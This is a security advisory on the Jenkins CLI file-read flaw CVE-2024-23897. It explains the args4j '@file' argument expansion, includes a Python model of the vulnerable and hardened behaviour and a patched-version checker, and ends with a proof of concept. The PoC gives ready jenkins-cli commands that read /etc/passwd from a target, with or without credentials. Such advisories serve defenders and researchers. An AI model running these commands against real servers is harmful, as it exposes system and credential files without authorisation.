Jenkins - CVE-2024-23897

Data leak vulnerability (fixed in version 2.442 and LTS 2.426.3)

Using the Jenkins CLI, it is possible to leak data (file contents) from the affected host.

When invoking a CLI command with arguments, we noticed that Jenkins uses args4j's parseArgument, which calls expandAtFiles:

// args4j CmdLineParser: every argument is inspected before the command sees it.
private String[] expandAtFiles(String args[]) throws CmdLineException {
    List<String> result = new ArrayList<String>();
    for (String arg : args) {
        // An argument of the form "@<path>" is treated as a file reference ...
        if (arg.startsWith("@")) {
            File file = new File(arg.substring(1));
            if (!file.exists())
                throw new CmdLineException(this,Messages.NO_SUCH_FILE,file.getPath());
            try {
                // ... and every line of that file becomes a separate argument.
                result.addAll(readAllLines(file));
            } catch (IOException ex) {
                throw new CmdLineException(this, "Failed to parse "+file,ex);
            }
        } else {
            result.add(arg);
        }
    }
    return result.toArray(new String[result.size()]);
}

The function checks whether the argument starts with the @ character; if so, it reads the file at the path that follows the @ and expands it into one new argument per line of that file.

This means that if an attacker can control a single argument, they can expand it into an arbitrary number of arguments taken line by line from an arbitrary file readable by the Jenkins process on the Jenkins instance.
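The following Python model is an added example, not code from the page or from Jenkins/args4j. It reproduces the expansion logic described above so the effect can be seen on a constructed file, places the hardened behaviour (refusing @-expansion, which is what disabling the feature amounts to) beside it, and adds a helper that checks a Jenkins version string against the fixed versions named at the top of this page. The function names, the `allow_at_syntax` switch and the sample file are all assumptions of this example.

```python
import tempfile
from pathlib import Path
from typing import Iterable, List, Tuple

# Fixed versions as stated in this advisory: weekly 2.442, LTS 2.426.3.
FIXED_WEEKLY = (2, 442)
FIXED_LTS = (2, 426, 3)


def expand_at_files(args: Iterable[str], allow_at_syntax: bool = False) -> List[str]:
    """Hypothetical Python port of args4j's expandAtFiles (not the real code).

    allow_at_syntax=True mirrors the vulnerable behaviour: an argument that
    starts with '@' is replaced by one argument per line of the named file.
    allow_at_syntax=False (the hardened default here) passes the argument
    through untouched, so no argument can ever pull in file contents.
    """
    result: List[str] = []
    for arg in args:
        if allow_at_syntax and arg.startswith("@"):
            path = Path(arg[1:])
            if not path.exists():
                raise ValueError(f"No such file: {path}")
            # Each line of the file becomes a separate argument.
            result.extend(path.read_text(encoding="utf-8").splitlines())
        else:
            result.append(arg)
    return result


def parse_version(version: str) -> Tuple[int, ...]:
    """Parse '2.441' (weekly) or '2.426.2' (LTS) into a comparable tuple."""
    parts = tuple(int(p) for p in version.strip().split("."))
    if len(parts) not in (2, 3):
        raise ValueError(f"Unrecognised Jenkins version format: {version!r}")
    return parts


def is_vulnerable(version: str) -> bool:
    """True when the version predates the fix for this advisory.

    Three-component versions are treated as the LTS line, two-component
    versions as weekly releases (assumption: Jenkins' usual numbering).
    """
    parts = parse_version(version)
    if len(parts) == 3:
        return parts < FIXED_LTS
    return parts < FIXED_WEEKLY


def demo() -> Tuple[List[str], List[str]]:
    """Run both behaviours against a constructed file; returns (unsafe, safe)."""
    with tempfile.TemporaryDirectory() as tmp:
        sample = Path(tmp) / "secret.txt"
        # Constructed sample content; nothing sensitive is read.
        sample.write_text("line-one\nline-two\nline-three\n", encoding="utf-8")
        argv = ["connect-node", "@" + str(sample)]
        unsafe = expand_at_files(argv, allow_at_syntax=True)
        safe = expand_at_files(argv)
        return unsafe, safe


if __name__ == "__main__":
    unsafe, safe = demo()
    print("vulnerable expansion:", unsafe)
    print("hardened expansion:  ", safe)
    for v in ("2.441", "2.442", "2.426.2", "2.426.3", "2.440.1"):
        print(f"Jenkins {v}: {'VULNERABLE' if is_vulnerable(v) else 'fixed'}")
```

The version check is the part a defender would reuse in an inventory script: feed it whatever version string your asset inventory or Jenkins UI reports and it tells you whether the instance predates the fix on its release line.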


PoC

Download the Jenkins CLI tool:

wget https://xxx.yyy/jnlpJars/jenkins-cli.jar

  1. Authenticated, retrieve the complete file:

$ java -jar jenkins-cli.jar -noCertificateCheck -s https://xxx.yyy/jenkins -auth abc:abc connect-node "@/etc/passwd"

  2. Unauthenticated, or missing Global/Read permissions, read ..

.. first line:

java -jar jenkins-cli.jar -noCertificateCheck -s https://xxx.yyy/jenkins who-am-i "@/etc/passwd"

.. second line:

java -jar jenkins-cli.jar -noCertificateCheck -s https://xxx.yyy/jenkins enable-job "@/etc/passwd"

.. third line:

java -jar jenkins-cli.jar -noCertificateCheck -s https://xxx.yyy/jenkins help "@/etc/passwd"

Credits: https://www.sonarsource.com/blog/excessive-expansion-uncovering-critical-security-vulnerabilities-in-jenkins/
